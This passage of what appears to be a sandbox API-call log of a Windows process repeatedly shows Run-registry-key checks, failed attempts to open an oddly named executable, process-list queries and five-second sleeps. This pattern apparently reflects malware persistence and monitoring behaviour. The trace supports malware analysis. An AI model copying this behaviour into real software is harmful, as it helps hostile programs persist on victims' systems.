ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.579] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.579] NtClose (Handle=0x14c) returned 0x0 [0175.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.579] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.579] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.579] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.579] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.583] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.594] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.594] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.594] NtClose (Handle=0x14c) returned 0x0 [0175.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.595] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.595] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.595] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.595] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.610] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.610] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.610] NtClose (Handle=0x14c) returned 0x0 [0175.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.610] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.610] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.610] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.611] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.614] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.625] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.625] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.625] NtClose (Handle=0x14c) returned 0x0 [0175.625] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.625] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.626] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.626] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.626] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.642] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.642] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.642] NtClose (Handle=0x14c) returned 0x0 [0175.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.643] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.643] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.643] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.643] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.659] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.660] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.660] NtClose (Handle=0x14c) returned 0x0 [0175.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.660] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.660] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.660] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.660] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.672] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.672] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.672] NtClose (Handle=0x14c) returned 0x0 [0175.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.672] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.673] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.673] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.673] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 